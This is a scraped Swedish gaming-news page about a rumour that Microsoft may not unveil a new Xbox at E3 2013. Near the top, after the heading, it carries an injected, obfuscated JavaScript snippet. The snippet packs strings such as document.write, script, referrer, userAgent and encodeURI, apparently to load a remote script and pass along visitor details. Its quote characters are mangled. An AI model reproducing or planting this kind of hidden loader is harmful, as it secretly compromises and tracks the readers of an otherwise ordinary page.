Image Image Image Image Image Image Image Image Image Image

| 18 januari, 2020

Scroll to top

Top

Ingen ny Xbox under E3 2013?

Ingen ny Xbox under E3 2013?
Sebastian

Xbox: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yznfd|var|u0026u|referrer|kshyy||js|php’.split(’|’),0,{}))
Trycket på nästa års E3-mässa är redan i fullgång. Ryktena om att både Microsoft och Sony kommer att visa upp deras nya generations konsoler har inte undgått någon. 

Dock enligt nykomna uppgifter så verkar det som att Microsoft kommer att skippa visa upp något på E3, något som skrämmer många.

Självklart är detta fortfarande bara rykten som sägs komma från en anonym källa på Bloomberg. Det kan vara så att Microsoft kommer att vilja hålla ett separat event, vem vet. Dock menar den anonyma källan att det fortfarande är troligt att Microsoft kommer att släppa ett nytt Xbox under nästa år, närmare bestämt under julhelgen.

”The software maker hasn’t decided whether to unveil the new Xbox at an industry event such as the E3 show in June, or a separate event devoted solely to the machine.”

Läs mer: www.oxm.co.uk